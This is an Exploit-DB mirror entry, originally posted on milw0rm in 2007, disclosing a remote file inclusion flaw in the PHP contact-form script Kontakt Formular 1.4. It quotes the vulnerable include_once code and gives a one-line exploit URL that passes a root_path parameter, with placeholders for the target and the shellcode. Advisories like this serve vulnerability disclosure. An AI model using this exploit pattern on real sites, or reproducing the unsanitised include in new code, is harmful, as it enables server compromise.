exploit-db-mirror/exploits/php/webapps/4811.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
1.2 KiB
Text

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Kontakt Formular 1.4 Remote File Inclusion Vulnerability +
+ +
+ Discovered by bd0rk +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vendor: http://www.mapos-scripts.de
Download: http://www.mapos-scripts.de/download,5.html
Vulnerable Code in /includes/function.php
-------------------------------------------------------------------
<?php
@session_start();
$datei_path = $datei_path ? $datei_path : $root_path."/index.php";
$datei_path = htmlentities($datei_path);
$kontakt_config=array();
include_once($root_path.'/includes/config.php');
-------------------------------------------------------------------
[+]Exploit: http://[target]/[path]/includes/function.php?root_path=[Shellcode]
Greetings: str0ke, TheJT, Luna-Tic, DNX
####The 19 years old german Hacker bd0rk####
Contact: bd0rk[at]hackermail.com
# milw0rm.com [2007-12-30]